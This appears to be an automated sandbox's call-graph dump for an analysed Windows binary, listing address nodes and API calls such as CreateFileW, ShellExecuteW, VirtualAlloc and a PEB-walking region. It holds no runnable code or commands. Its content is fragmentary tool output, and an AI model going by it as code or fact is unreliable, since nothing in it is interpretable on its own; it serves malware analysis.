97741 76d7bc 97423->97741 97425 777201 97426 76d4ce 4 API calls 97425->97426 97427 77720b 97426->97427 97428 707510 53 API calls 97427->97428 97432 777239 97427->97432 97429 777229 97428->97429 97795 772947 97429->97795 97431 704f39 68 API calls 97431->97374 97432->97431 97886 76dbbe lstrlenW 97433->97886 97437 777474 97436->97437 97438 777469 97436->97438 97441 70a961 22 API calls 97437->97441 97475 777554 97437->97475 97439 70b567 39 API calls 97438->97439 97439->97437 97440 71fddb 22 API calls 97442 777587 97440->97442 97444 777495 97441->97444 97443 71fe0b 22 API calls 97442->97443 97445 777598 97443->97445 97446 70a961 22 API calls 97444->97446 97891 706246 97445->97891 97448 77749e 97446->97448 97450 707510 53 API calls 97448->97450 97452 7774aa 97450->97452 97451 70a961 22 API calls 97454 7775ab 97451->97454 97453 70525f 22 API calls 97452->97453 97455 7774bf 97453->97455 97456 706246 CloseHandle 97454->97456 97457 706350 22 API calls 97455->97457 97458 7775b2 97456->97458 97459 7774f2 97457->97459 97460 707510 53 API calls 97458->97460 97461 77754a 97459->97461 97463 76d4ce 4 API calls 97459->97463 97462 7775be 97460->97462 97465 70b567 39 API calls 97461->97465 97464 706246 CloseHandle 97462->97464 97466 777502 97463->97466 97467 7775c8 97464->97467 97465->97475 97466->97461 97468 777506 97466->97468 97895 705745 97467->97895 97469 709cb3 22 API calls 97468->97469 97471 777513 97469->97471 97918 76d2c1 26 API calls 97471->97918 97473 7776de GetLastError 97477 7776f7 97473->97477 97474 7775ea 97903 7053de 97474->97903 97475->97440 97491 7776a4 97475->97491 97922 706216 CloseHandle messages 97477->97922 97480 7775f8 97919 7053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97480->97919 97482 77751c 97482->97461 97483 777645 97484 71fddb 22 API calls 97483->97484 97487 777679 97484->97487 97485 7775ff 97485->97483 97486 777619 97485->97486 97920 76ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97486->97920 97489 70a961 22 API calls 97487->97489 97490 777686 97489->97490 97490->97491 97921 76417d 22 API calls __fread_nolock 97490->97921 97491->97317 97941 709c6e 97493->97941 97496 71fddb 22 API calls 97498 71f02b 97496->97498 97499 71fe0b 22 API calls 97498->97499 97502 71f03c 97499->97502 97500 71f0a4 97504 70b567 39 API calls 97500->97504 97508 71f0b1 97500->97508 97501 75f0a8 97501->97500 97974 779caa 39 API calls 97501->97974 97503 706246 CloseHandle 97502->97503 97505 71f047 97503->97505 97506 75f10a 97504->97506 97507 70a961 22 API calls 97505->97507 97506->97508 97509 75f112 97506->97509 97510 71f04f 97507->97510 97512 71fa5b 3 API calls 97508->97512 97513 70b567 39 API calls 97509->97513 97511 706246 CloseHandle 97510->97511 97514 71f056 97511->97514 97518 71f0b8 97512->97518 97513->97518 97515 707510 53 API calls 97514->97515 97516 71f062 97515->97516 97517 706246 CloseHandle 97516->97517 97519 71f06c 97517->97519 97520 75f127 97518->97520 97521 71f0d3 97518->97521 97522 705745 5 API calls 97519->97522 97524 71fe0b 22 API calls 97520->97524 97523 706270 22 API calls 97521->97523 97525 71f07d 97522->97525 97526 71f0db 97523->97526 97527 75f12c 97524->97527 97528 71f085 97525->97528 97529 75f0a0 97525->97529 97955 71f141 97526->97955 97531 75f140 97527->97531 97975 71f866 ReadFile SetFilePointerEx 97527->97975 97536 7053de 27 API calls 97528->97536 97973 706216 CloseHandle messages 97529->97973 97539 75f144 __fread_nolock 97531->97539 97976 770e85 22 API calls ___scrt_fastfail 97531->97976 97534 71f0ea 97534->97539 97970 7062b5 22 API calls 97534->97970 97538 71f093 97536->97538 97969 7053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97538->97969 97541 71f0fe 97542 71f138 97541->97542 97545 706246 CloseHandle 97541->97545 97542->97317 97543 71f09a 97543->97500 97544 75f069 97543->97544 97972 76ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97544->97972 97546 71f12c 97545->97546 97546->97542 97971 706216 CloseHandle messages 97546->97971 97548 75f080 97548->97500 97550->97320 97551->97278 97552->97281 97553->97291 97554->97303 97555->97303 97556->97280 97557->97316 97558->97316 97559->97316 97560->97312 97561->97316 97562->97341 97563->97343 97564->97342 97565->97346 97604 707510 97566->97604 97570 78844f 97668 788ee4 60 API calls 97570->97668 97571 787fd5 messages 97571->97349 97574 78845e 97576 78846a 97574->97576 97577 78828f 97574->97577 97575 788049 97575->97571 97578 707510 53 API calls 97575->97578 97591 788281 97575->97591 97659 76417d 22 API calls __fread_nolock 97575->97659 97660 78851d 42 API calls _strftime 97575->97660 97576->97571 97640 787e86 97577->97640 97578->97575 97583 7882c8 97655 71fc70 97583->97655 97586 7882e8 97661 77359c 82 API calls __wsopen_s 97586->97661 97587 788302 97662 7063eb 22 API calls 97587->97662 97590 7882f3 GetCurrentProcess TerminateProcess 97590->97587 97591->97570 97591->97577 97592 788311 97663 706a50 22 API calls 97592->97663 97594 78832a 97603 788352 97594->97603 97664 7104f0 22 API calls 97594->97664 97596 7884c5 97596->97571 97598 7884d9 FreeLibrary 97596->97598 97597 788341 97665 788b7b 75 API calls 97597->97665 97598->97571 97603->97596 97666 7104f0 22 API calls 97603->97666 97667 70aceb 23 API calls messages 97603->97667 97669 788b7b 75 API calls 97603->97669 97605 707522 97604->97605 97606 707525 97604->97606 97605->97571 97627 788cd3 97605->97627 97607 70755b 97606->97607 97608 70752d 97606->97608 97610 7450f6 97607->97610 97613 70756d 97607->97613 97618 74500f 97607->97618 97670 7251c6 26 API calls 97608->97670 97673 725183 26 API calls 97610->97673 97611 70753d 97617 71fddb 22 API calls 97611->97617 97671 71fb21 51 API calls 97613->97671 97614 74510e 97614->97614 97619 707547 97617->97619 97621 71fe0b 22 API calls 97618->97621 97622 745088 97618->97622 97620 709cb3 22 API calls 97619->97620 97620->97605 97623 745058 97621->97623 97672 71fb21 51 API calls 97622->97672 97624 71fddb 22 API calls 97623->97624 97625 74507f 97624->97625 97626 709cb3 22 API calls 97625->97626 97626->97622 97628 70aec9 22 API calls 97627->97628 97629 788cee CharLowerBuffW 97628->97629 97674 768e54 97629->97674 97633 70a961 22 API calls 97634 788d2a 97633->97634 97681 706d25 97634->97681 97636 788d3e 97637 7093b2 22 API calls 97636->97637 97639 788d48 _wcslen 97637->97639 97638 788e5e _wcslen 97638->97575 97639->97638 97694 78851d 42 API calls _strftime 97639->97694 97641 787ea1 97640->97641 97645 787eec 97640->97645 97642 71fe0b 22 API calls 97641->97642 97643 787ec3 97642->97643 97644 71fddb 22 API calls 97643->97644 97643->97645 97644->97643 97646 789096 97645->97646 97647 7892ab messages 97646->97647 97654 7890ba _strcat _wcslen 97646->97654 97647->97583 97648 70b567 39 API calls 97648->97654 97649 70b38f 39 API calls 97649->97654 97650 70b6b5 39 API calls 97650->97654 97651 707510 53 API calls 97651->97654 97652 72ea0c 21 API calls ___std_exception_copy 97652->97654 97654->97647 97654->97648 97654->97649 97654->97650 97654->97651 97654->97652 97698 76efae 24 API calls _wcslen 97654->97698 97658 71fc85 97655->97658 97656 71fd1d VirtualAlloc 97657 71fceb 97656->97657 97657->97586 97657->97587 97658->97656 97658->97657 97659->97575 97660->97575 97661->97590 97662->97592 97663->97594 97664->97597 97665->97603 97666->97603 97667->97603 97668->97574 97669->97603 97670->97611 97671->97611 97672->97610 97673->97614 97676 768e74 _wcslen 97674->97676 97675 768f63 97675->97633 97675->97639 97676->97675 97677 768f68 97676->97677 97679 768ea9 97676->97679 97677->97675 97696 71ce60 41 API calls 97677->97696 97679->97675 97695 71ce60 41 API calls 97679->97695 97682 706d91 97681->97682 97683 706d34 97681->97683 97685 7093b2 22 API calls 97682->97685 97683->97682 97684 706d3f 97683->97684 97686 744c9d 97684->97686 97687 706d5a 97684->97687 97690 706d62 __fread_nolock 97685->97690 97689 71fddb 22 API calls 97686->97689 97697 706f34 22 API calls 97687->97697 97691 744ca7 97689->97691 97690->97636 97692 71fe0b 22 API calls 97691->97692 97693 744cda 97692->97693 97694->97638 97695->97679 97696->97677 97697->97690 97698->97654 97700 70a961 22 API calls 97699->97700 97701 705275 97700->97701 97702 70a961 22 API calls 97701->97702 97703 70527d 97702->97703 97704 70a961 22 API calls 97703->97704 97705 705285 97704->97705 97706 70a961 22 API calls 97705->97706 97707 70528d 97706->97707 97708 743df5 97707->97708 97709 7052c1 97707->97709 97710 70a8c7 22 API calls 97708->97710 97711 706d25 22 API calls 97709->97711 97712 743dfe 97710->97712 97713 7052cf 97711->97713 97714 70a6c3 22 API calls 97712->97714 97715 7093b2 22 API calls 97713->97715 97719 705304 97714->97719 97716 7052d9 97715->97716 97717 706d25 22 API calls 97716->97717 97716->97719 97722 7052fa 97717->97722 97718 705349 97721 706d25 22 API calls 97718->97721 97719->97718 97720 705325 97719->97720 97737 743e20 97719->97737 97720->97718 97726 704c6d 22 API calls 97720->97726 97723 70535a 97721->97723 97724 7093b2 22 API calls 97722->97724 97725 705370 97723->97725 97730 70a8c7 22 API calls 97723->97730 97724->97719 97727 705384 97725->97727 97732 70a8c7 22 API calls 97725->97732 97728 705332 97726->97728 97731 70538f 97727->97731 97734 70a8c7 22 API calls 97727->97734 97728->97718 97733 706d25 22 API calls 97728->97733 97729 706b57 22 API calls 97738 743ee0 97729->97738 97730->97725 97735 70a8c7 22 API calls 97731->97735 97739 70539a 97731->97739 97732->97727 97733->97718 97734->97731 97735->97739 97736 704c6d 22 API calls 97736->97738 97737->97729 97738->97718 97738->97736 97857 7049bd 22 API calls __fread_nolock 97738->97857 97739->97403 97742 76d7d8 97741->97742 97743 76d7f3 97742->97743 97744 76d7dd 97742->97744 97746 70a961 22 API calls 97743->97746 97745 76d7ee 97744->97745 97747 70a8c7 22 API calls 97744->97747 97745->97425 97748 76d7fb 97746->97748 97747->97745 97749 70a961 22 API calls 97748->97749 97750 76d803 97749->97750 97751 70a961 22 API calls 97750->97751 97752 76d80e 97751->97752 97753 70a961 22 API calls 97752->97753 97754 76d816 97753->97754 97755 70a961 22 API calls 97754->97755 97756 76d81e 97755->97756 97757 70a961 22 API calls 97756->97757 97758 76d826 97757->97758 97759 70a961 22 API calls 97758->97759 97760 76d82e 97759->97760 97761 70a961 22 API calls 97760->97761 97762 76d836 97761->97762 97763 70525f 22 API calls 97762->97763 97764 76d84d 97763->97764 97765 70525f 22 API calls 97764->97765 97766 76d866 97765->97766 97767 704c6d 22 API calls 97766->97767 97768 76d872 97767->97768 97769 76d885 97768->97769 97771 7093b2 22 API calls 97768->97771 97770 704c6d 22 API calls 97769->97770 97772 76d88e 97770->97772 97771->97769 97773 76d89e 97772->97773 97774 7093b2 22 API calls 97772->97774 97775 76d8b0 97773->97775 97776 70a8c7 22 API calls 97773->97776 97774->97773 97777 706350 22 API calls 97775->97777 97776->97775 97778 76d8bb 97777->97778 97858 76d978 22 API calls 97778->97858 97780 76d8ca 97859 76d978 22 API calls 97780->97859 97782 76d8dd 97783 704c6d 22 API calls 97782->97783 97784 76d8e7 97783->97784 97785 76d8fe 97784->97785 97786 76d8ec 97784->97786 97788 704c6d 22 API calls 97785->97788 97787 7033c6 22 API calls 97786->97787 97794 76d8f9 97787->97794 97789 76d907 97788->97789 97790 76d925 97789->97790 97791 7033c6 22 API calls 97789->97791 97793 706350 22 API calls 97790->97793 97791->97794 97792 706350 22 API calls 97792->97790 97793->97745 97794->97792 97796 772954 __wsopen_s 97795->97796 97797 71fe0b 22 API calls 97796->97797 97798 772971 97797->97798 97799 705722 22 API calls 97798->97799 97800 77297b 97799->97800 97860 77274e 97800->97860 97802 772986 97803 70511f 64 API calls 97802->97803 97804 77299b 97803->97804 97805 7729bf 97804->97805 97806 772a6c 97804->97806 97867 772e66 75 API calls 97805->97867 97870 772e66 75 API calls 97806->97870 97809 7729c4 97814 772a75 messages 97809->97814 97868 72d583 26 API calls 97809->97868 97811 7050f5 40 API calls 97812 772a91 97811->97812 97813 7050f5 40 API calls 97812->97813 97816 772aa1 97813->97816 97814->97432 97815 7729ed 97869 72d583 26 API calls 97815->97869 97817 7050f5 40 API calls 97816->97817 97819 772abc 97817->97819 97820 7050f5 40 API calls 97819->97820 97821 772acc 97820->97821 97822 7050f5 40 API calls 97821->97822 97824 772ae7 97822->97824 97823 772a38 97823->97811 97823->97814 97825 7050f5 40 API calls 97824->97825 97826 772af7 97825->97826 97827 7050f5 40 API calls 97826->97827 97828 772b07 97827->97828 97829 7050f5 40 API calls 97828->97829 97830 772b17 97829->97830 97863 773017 GetTempPathW GetTempFileNameW 97830->97863 97832 772b22 97833 72e5eb 29 API calls 97832->97833 97835 772b33 97833->97835 97834 72e678 67 API calls 97836 772bf8 97834->97836 97835->97814 97837 7050f5 40 API calls 97835->97837 97844 72dbb3 65 API calls 97835->97844 97846 772bed 97835->97846 97838 772c12 97836->97838 97839 772bfe DeleteFileW 97836->97839 97837->97835 97840 772c91 CopyFileW 97838->97840 97845 772c18 97838->97845 97839->97814 97844->97835 97846->97834 97851 70b578 97850->97851 97852 70b57f 97850->97852 97851->97852 97885 7262d1 39 API calls _strftime 97851->97885 97852->97358 97854 70b5c2 97854->97358 97855->97392 97856->97405 97857->97738 97858->97780 97859->97782 97871 72e4e8 97860->97871 97862 77275d 97862->97802 97863->97832 97867->97809 97868->97815 97869->97823 97870->97823 97874 72e469 97871->97874 97873 72e505 97873->97862 97875 72e478 97874->97875 97876 72e48c 97874->97876 97882 72f2d9 20 API calls __dosmaperr 97875->97882 97881 72e488 __alldvrm 97876->97881 97884 73333f 11 API calls 2 library calls 97876->97884 97878 72e47d 97883 7327ec 26 API calls pre_c_initialization 97878->97883 97881->97873 97882->97878 97883->97881 97884->97881 97885->97854 97887 76d4d5 97886->97887 97888 76dbdc GetFileAttributesW 97886->97888 97887->97317 97888->97887 97889 76dbe8 FindFirstFileW 97888->97889 97889->97887 97890 76dbf9 FindClose 97889->97890 97890->97887 97892 706250 97891->97892 97893 70625f 97891->97893 97892->97451 97893->97892 97894 706264 CloseHandle 97893->97894 97894->97892 97896 744035 97895->97896 97897 70575c CreateFileW 97895->97897 97898 70577b 97896->97898 97899 74403b CreateFileW 97896->97899 97897->97898 97898->97473 97898->97474 97899->97898 97900 744063 97899->97900 97923 7054c6 97900->97923 97904 7053f3 97903->97904 97917 7053f0 messages 97903->97917 97905 7054c6 3 API calls 97904->97905 97904->97917 97906 705410 97905->97906 97907 70541d 97906->97907 97908 743f4b 97906->97908 97910 71fe0b 22 API calls 97907->97910 97935 71fa5b 97908->97935 97911 705429 97910->97911 97912 705722 22 API calls 97911->97912 97913 705433 97912->97913 97929 709a40 97913->97929 97916 7054c6 3 API calls 97916->97917 97917->97480 97918->97482 97919->97485 97920->97483 97921->97491 97922->97491 97928 7054dd 97923->97928 97924 705564 SetFilePointerEx SetFilePointerEx 97927 705530 97924->97927 97925 743f9c SetFilePointerEx 97926 743f8b 97926->97925 97927->97898 97928->97924 97928->97925 97928->97926 97928->97927 97930 709abb 97929->97930 97933 709a4e 97929->97933 97940 71e40f SetFilePointerEx 97930->97940 97932 70543f 97932->97916 97933->97932 97934 709a8c ReadFile 97933->97934 97934->97932 97934->97933 97936 7054c6 3 API calls 97935->97936 97937 71fa79 97936->97937 97938 7054c6 3 API calls 97937->97938 97939 71fa9a 97938->97939 97939->97917 97940->97933 97942 74f545 97941->97942 97943 709c7e 97941->97943 97944 74f556 97942->97944 97945 706b57 22 API calls 97942->97945 97948 71fddb 22 API calls 97943->97948 97946 70a6c3 22 API calls 97944->97946 97945->97944 97947 74f560 97946->97947 97947->97947 97949 709c91 97948->97949 97950 709c9a 97949->97950 97951 709cac 97949->97951 97953 709cb3 22 API calls 97950->97953 97952 70a961 22 API calls 97951->97952 97954 709ca2 97952->97954 97953->97954 97954->97496 97954->97501 97956 71f188 97955->97956 97957 71f14c 97955->97957 97958 70a6c3 22 API calls 97956->97958 97957->97956 97959 71f15b 97957->97959 97965 76caeb 97958->97965 97960 71f170 97959->97960 97963 71f17d 97959->97963 97977 71f18e 97960->97977 97961 76cb1a 97961->97534 97984 76cbf2 26 API calls 97963->97984 97965->97961 97985 76ca89 ReadFile SetFilePointerEx 97965->97985 97986 7049bd 22 API calls __fread_nolock 97965->97986 97966 71f179 97966->97534 97969->97543 97970->97541 97971->97542 97972->97548 97973->97501 97974->97501 97975->97531 97976->97539 97987 71f1d8 97977->97987 97983 71f1c1 97983->97966 97984->97966 97985->97965 97986->97965 97988 71fe0b 22 API calls 97987->97988 97989 71f1ef 97988->97989 97990 71fddb 22 API calls 97989->97990 97991 71f1a6 97990->97991 97992 7097b6 97991->97992 98006 709a1e 97992->98006 97994 7097c7 97995 709a40 2 API calls 97994->97995 97996 7097fc 97994->97996 98013 709b01 22 API calls __fread_nolock 97994->98013 97995->97994 97996->97983 97998 706e14 MultiByteToWideChar 97996->97998 97999 706e40 97998->97999 98000 706e87 97998->98000 98002 71fe0b 22 API calls 97999->98002 98001 70a6c3 22 API calls 98000->98001 98005 706e7b 98001->98005 98003 706e55 MultiByteToWideChar 98002->98003 98014 706e90 22 API calls __fread_nolock 98003->98014 98005->97983 98007 74f378 98006->98007 98008 709a2f 98006->98008 98009 71fddb 22 API calls 98007->98009 98008->97994 98010 74f382 98009->98010 98011 71fe0b 22 API calls 98010->98011 98012 74f397 98011->98012 98013->97994 98014->98005 98015 738402 98020 7381be 98015->98020 98018 73842a 98025 7381ef try_get_first_available_module 98020->98025 98022 7383ee 98039 7327ec 26 API calls pre_c_initialization 98022->98039 98024 738343 98024->98018 98032 740984 98024->98032 98028 738338 98025->98028 98035 728e0b 40 API calls 2 library calls 98025->98035 98027 73838c 98027->98028 98036 728e0b 40 API calls 2 library calls 98027->98036 98028->98024 98038 72f2d9 20 API calls __dosmaperr 98028->98038 98030 7383ab 98030->98028 98037 728e0b 40 API calls 2 library calls 98030->98037 98040 740081 98032->98040 98034 74099f 98034->98018 98035->98027 98036->98030 98037->98028 98038->98022 98039->98024 98043 74008d ___DestructExceptionObject 98040->98043 98041 74009b 98098 72f2d9 20 API calls __dosmaperr 98041->98098 98043->98041 98045 7400d4 98043->98045 98044 7400a0 98099 7327ec 26 API calls pre_c_initialization 98044->98099 98051 74065b 98045->98051 98050 7400aa __fread_nolock 98050->98034 98101 74042f 98051->98101 98054 7406a6 98119 735221 98054->98119 98055 74068d 98133 72f2c6 20 API calls __dosmaperr 98055->98133 98058 7406ab 98060 7406b4 98058->98060 98061 7406cb 98058->98061 98059 740692 98134 72f2d9 20 API calls __dosmaperr 98059->98134 98135 72f2c6 20 API calls __dosmaperr 98060->98135 98132 74039a CreateFileW 98061->98132 98065 7406b9 98136 72f2d9 20 API calls __dosmaperr 98065->98136 98066 7400f8 98100 740121 LeaveCriticalSection __wsopen_s 98066->98100 98068 740781 GetFileType 98069 7407d3 98068->98069 98070 74078c GetLastError 98068->98070 98141 73516a 21 API calls 2 library calls 98069->98141 98139 72f2a3 20 API calls __dosmaperr 98070->98139 98071 740756 GetLastError 98138 72f2a3 20 API calls __dosmaperr 98071->98138 98073 740704 98073->98068 98073->98071 98137 74039a CreateFileW 98073->98137 98075 74079a CloseHandle 98075->98059 98077 7407c3 98075->98077 98140 72f2d9 20 API calls __dosmaperr 98077->98140 98079 740749 98079->98068 98079->98071 98081 7407f4 98083 740840 98081->98083 98142 7405ab 72 API calls 3 library calls 98081->98142 98082 7407c8 98082->98059 98087 74086d 98083->98087 98143 74014d 72 API calls 4 library calls 98083->98143 98086 740866 98086->98087 98088 74087e 98086->98088 98089 7386ae __wsopen_s 29 API calls 98087->98089 98088->98066 98090 7408fc CloseHandle 98088->98090 98089->98066 98144 74039a CreateFileW 98090->98144 98092 740927 98093 740931 GetLastError 98092->98093 98097 74095d 98092->98097 98145 72f2a3 20 API calls __dosmaperr 98093->98145 98095 74093d 98146 735333 21 API calls 2 library calls 98095->98146 98097->98066 98098->98044 98099->98050 98100->98050 98102 74046a 98101->98102 98103 740450 98101->98103 98147 7403bf 98102->98147 98103->98102 98154 72f2d9 20 API calls __dosmaperr 98103->98154 98106 74045f 98155 7327ec 26 API calls pre_c_initialization 98106->98155 98108 7404d1 98117 740524 98108->98117 98158 72d70d 26 API calls 2 library calls 98108->98158 98109 7404a2 98109->98108 98156 72f2d9 20 API calls __dosmaperr 98109->98156 98112 74051f 98114 74059e 98112->98114 98112->98117 98113 7404c6 98157 7327ec 26 API calls pre_c_initialization 98113->98157 98159 7327fc 11 API calls _abort 98114->98159 98117->98054 98117->98055 98118 7405aa 98120 73522d ___DestructExceptionObject 98119->98120 98162 732f5e EnterCriticalSection 98120->98162 98122 735234 98123 735259 98122->98123 98128 7352c7 EnterCriticalSection 98122->98128 98129 73527b 98122->98129 98125 735000 __wsopen_s 21 API calls 98123->98125 98127 73525e 98125->98127 98126 7352a4 __fread_nolock 98126->98058 98127->98129 98166 735147 EnterCriticalSection 98127->98166 98128->98129 98130 7352d4 LeaveCriticalSection 98128->98130 98163 73532a 98129->98163 98130->98122 98132->98073 98133->98059 98134->98066 98135->98065 98136->98059 98137->98079 98138->98059 98139->98075 98140->98082 98141->98081 98142->98083 98143->98086 98144->98092 98145->98095 98146->98097 98150 7403d7 98147->98150 98148 7403f2 98148->98109 98150->98148 98160 72f2d9 20 API calls __dosmaperr 98150->98160 98151 740416 98161 7327ec 26 API calls pre_c_initialization 98151->98161 98153 740421 98153->98109 98154->98106 98155->98102 98156->98113 98157->98108 98158->98112 98159->98118 98160->98151 98161->98153 98162->98122 98167 732fa6 LeaveCriticalSection 98163->98167 98165 735331 98165->98126 98166->98129 98167->98165 98168 742ba5 98169 702b25 98168->98169 98170 742baf 98168->98170 98196 702b83 7 API calls 98169->98196 98172 703a5a 24 API calls 98170->98172 98174 742bb8 98172->98174 98176 709cb3 22 API calls 98174->98176 98178 742bc6 98176->98178 98177 702b2f 98181 703837 49 API calls 98177->98181 98187 702b44 98177->98187 98179 742bf5 98178->98179 98180 742bce 98178->98180 98182 7033c6 22 API calls 98179->98182 98183 7033c6 22 API calls 98180->98183 98181->98187 98184 742bf1 GetForegroundWindow ShellExecuteW 98182->98184 98185 742bd9 98183->98185 98190 742c26 98184->98190 98189 706350 22 API calls 98185->98189 98188 702b5f 98187->98188 98200 7030f2 Shell_NotifyIconW ___scrt_fastfail 98187->98200 98194 702b66 SetCurrentDirectoryW 98188->98194 98192 742be7 98189->98192 98190->98188 98193 7033c6 22 API calls 98192->98193 98193->98184 98195 702b7a 98194->98195 98201 702cd4 7 API calls 98196->98201 98198 702b2a 98199 702c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98198->98199 98199->98177 98200->98188 98201->98198 98202 25323c0 98216 2530000 98202->98216 98204 2532456 98219 25322b0 98204->98219 98222 25334a0 GetPEB 98216->98222 98218 253068b 98218->98204 98220 25322b9 Sleep 98219->98220 98221 25322c7 98220->98221 98223 25334ca 98222->98223 98223->98218 98224 702de3 98225 702df0 __wsopen_s 98224->98225 98226 702e09 98225->98226 98227 742c2b ___scrt_fastfail 98225->98227 98228 703aa2 23 API calls 98226->98228 98230 742c47 GetOpenFileNameW 98227->98230 98229 702e12 98228->98229 98240 702da5 98229->98240 98232 742c96 98230->98232 98233 706b57 22 API calls 98232->98233 98235 742cab 98233->98235 98235->98235 98237 702e27 98258 7044a8 98237->98258 98241 741f50 __wsopen_s 98240->98241 98242 702db2 GetLongPathNameW 98241->98242 98243 706b57 22 API calls 98242->98243 98244 702dda 98243->98244 98245 703598 98244->98245 98246 70a961 22 API calls 98245->98246 98247 7035aa 98246->98247 98248 703aa2 23 API calls 98247->98248 98249 7035b5 98248->98249 98250 7035c0 98249->98250 98255 7432eb 98249->98255 98251 70515f 22 API calls 98250->98251 98253 7035cc 98251->98253 98287 7035f3 98253->98287 98256 74330d 98255->98256 98293 71ce60 41 API calls 98255->98293 98257 7035df 98257->98237 98259 704ecb 94 API calls 98258->98259 98260 7044cd 98259->98260 98261 743833 98260->98261 98262 704ecb 94 API calls 98260->98262 98263 772cf9 80 API calls 98261->98263 98264 7044e1 98262->98264 98265 743848 98263->98265 98264->98261 98266 7044e9 98264->98266 98267 74384c 98265->98267 98268 743869 98265->98268 98270 743854 98266->98270 98271 7044f5 98266->98271 98272 704f39 68 API calls 98267->98272 98269 71fe0b 22 API calls 98268->98269 98284 7438ae 98269->98284 98309 76da5a 82 API calls 98270->98309 98308 70940c 136 API calls 2 library calls 98271->98308 98272->98270 98275 702e31 98276 743862 98276->98268 98277 704f39 68 API calls 98280 743a5f 98277->98280 98280->98277 98313 76989b 82 API calls __wsopen_s 98280->98313 98283 709cb3 22 API calls 98283->98284 98284->98280 98284->98283 98294 70a4a1 98284->98294 98302 703ff7 98284->98302 98310 76967e 22 API calls __fread_nolock 98284->98310 98311 7695ad 42 API calls _wcslen 98284->98311 98312 770b5a 22 API calls 98284->98312 98288 703605 98287->98288 98292 703624 __fread_nolock 98287->98292 98290 71fe0b 22 API calls 98288->98290 98289 71fddb 22 API calls 98291 70363b 98289->98291 98290->98292 98291->98257 98292->98289 98293->98255 98295 70a4b1 __fread_nolock 98294->98295 98296 70a52b 98294->98296 98297 71fddb 22 API calls 98295->98297 98299 71fe0b 22 API calls 98296->98299 98298 70a4b8 98297->98298 98300 70a4d6 98298->98300 98301 71fddb 22 API calls 98298->98301 98299->98295 98300->98284 98301->98300 98303 70400a 98302->98303 98305 7040ae 98302->98305 98304 71fe0b 22 API calls 98303->98304 98306 70403c 98303->98306 98304->98306 98305->98284 98306->98305 98307 71fddb 22 API calls 98306->98307 98307->98306 98308->98275 98309->98276 98310->98284 98311->98284 98312->98284 98313->98280 98314 701044 98319 7010f3 98314->98319 98316 70104a 98355 7200a3 29 API calls __onexit 98316->98355 98318 701054 98356 701398 98319->98356 98323 70116a 98324 70a961 22 API calls 98323->98324 98325 701174 98324->98325 98326 70a961 22 API calls 98325->98326 98327 70117e 98326->98327 98328 70a961 22 API calls 98327->98328 98329 701188 98328->98329 98330 70a961 22 API calls 98329->98330 98331 7011c6 98330->98331 98332 70a961 22 API calls 98331->98332 98333 701292 98332->98333 98366 70171c 98333->98366 98337 7012c4 98338 70a961 22 API calls 98337->98338 98339 7012ce 98338->98339 98340 711940 9 API calls 98339->98340 98341 7012f9 98340->98341 98387 701aab 98341->98387 98343 701315 98344 701325 GetStdHandle 98343->98344 98345 742485 98344->98345 98346 70137a 98344->98346 98345->98346 98347 74248e 98345->98347 98350 701387 OleInitialize 98346->98350 98348 71fddb 22 API calls 98347->98348 98349 742495 98348->98349 98394 77011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98349->98394 98350->98316 98352 74249e 98395 770944 CreateThread 98352->98395 98354 7424aa CloseHandle 98354->98346 98355->98318 98396 7013f1 98356->98396 98359 7013f1 22 API calls 98360 7013d0 98359->98360 98361 70a961 22 API calls 98360->98361 98362 7013dc 98361->98362 98363 706b57 22 API calls 98362->98363 98364 701129 98363->98364 98365 701bc3 6 API calls 98364->98365 98365->98323 98367 70a961 22 API calls 98366->98367 98368 70172c 98367->98368 98369 70a961 22 API calls 98368->98369 98370 701734 98369->98370 98371 70a961 22 API calls 98370->98371 98372 70174f 98371->98372 98373 71fddb 22 API calls 98372->98373 98374 70129c 98373->98374 98375 701b4a 98374->98375 98376 701b58 98375->98376 98377 70a961 22 API calls 98376->98377 98378 701b63 98377->98378 98379 70a961 22 API calls 98378->98379 98380 701b6e 98379->98380 98381 70a961 22 API calls 98380->98381 98382 701b79 98381->98382 98383 70a961 22 API calls 98382->98383 98384 701b84 98383->98384 98385 71fddb 22 API calls 98384->98385 98386 701b96 RegisterWindowMessageW 98385->98386 98386->98337 98388 74272d 98387->98388 98389 701abb 98387->98389 98403 773209 23 API calls 98388->98403 98390 71fddb 22 API calls 98389->98390 98392 701ac3 98390->98392 98392->98343 98393 742738 98394->98352 98395->98354 98404 77092a 28 API calls 98395->98404 98397 70a961 22 API calls 98396->98397 98398 7013fc 98397->98398 98399 70a961 22 API calls 98398->98399 98400 701404 98399->98400 98401 70a961 22 API calls 98400->98401 98402 7013c6 98401->98402 98402->98359 98403->98393 98405 752a00 98420 70d7b0 messages 98405->98420 98406 70db11 PeekMessageW 98406->98420 98407 70d807 GetInputState 98407->98406 98407->98420 98409 751cbe TranslateAcceleratorW 98409->98420 98410 70da04 timeGetTime 98410->98420 98411 70db73 TranslateMessage DispatchMessageW 98412 70db8f PeekMessageW 98411->98412 98412->98420 98413 70dbaf Sleep 98429 70dbc0 98413->98429 98414 752b74 Sleep 98414->98429 98415 71e551 timeGetTime 98415->98429 98416 751dda timeGetTime 98469 71e300 23 API calls 98416->98469 98419 752c0b GetExitCodeProcess 98424 752c37 CloseHandle 98419->98424 98425 752c21 WaitForSingleObject 98419->98425 98420->98406 98420->98407 98420->98409 98420->98410 98420->98411 98420->98412 98420->98413 98420->98414 98420->98416 98422 70d9d5 98420->98422 98433 70ec40 256 API calls 98420->98433 98434 711310 256 API calls 98420->98434 98437 70dd50 98420->98437 98444 70dfd0 98420->98444 98467 70bf40 256 API calls 2 library calls 98420->98467 98468 71edf6 IsDialogMessageW GetClassLongW 98420->98468 98470 773a2a 23 API calls 98420->98470 98471 77359c 82 API calls __wsopen_s 98420->98471 98421 7929bf GetForegroundWindow 98421->98429 98424->98429 98425->98420 98425->98424 98426 752a31 98426->98422 98427 752ca9 Sleep 98427->98420 98429->98415 98429->98419 98429->98420 98429->98421 98429->98422 98429->98426 98429->98427 98472 785658 23 API calls 98429->98472 98473 76e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98429->98473 98474 76d4dc 47 API calls 98429->98474 98433->98420 98434->98420 98438 70dd83 98437->98438 98439 70dd6f 98437->98439 98476 77359c 82 API calls __wsopen_s 98438->98476 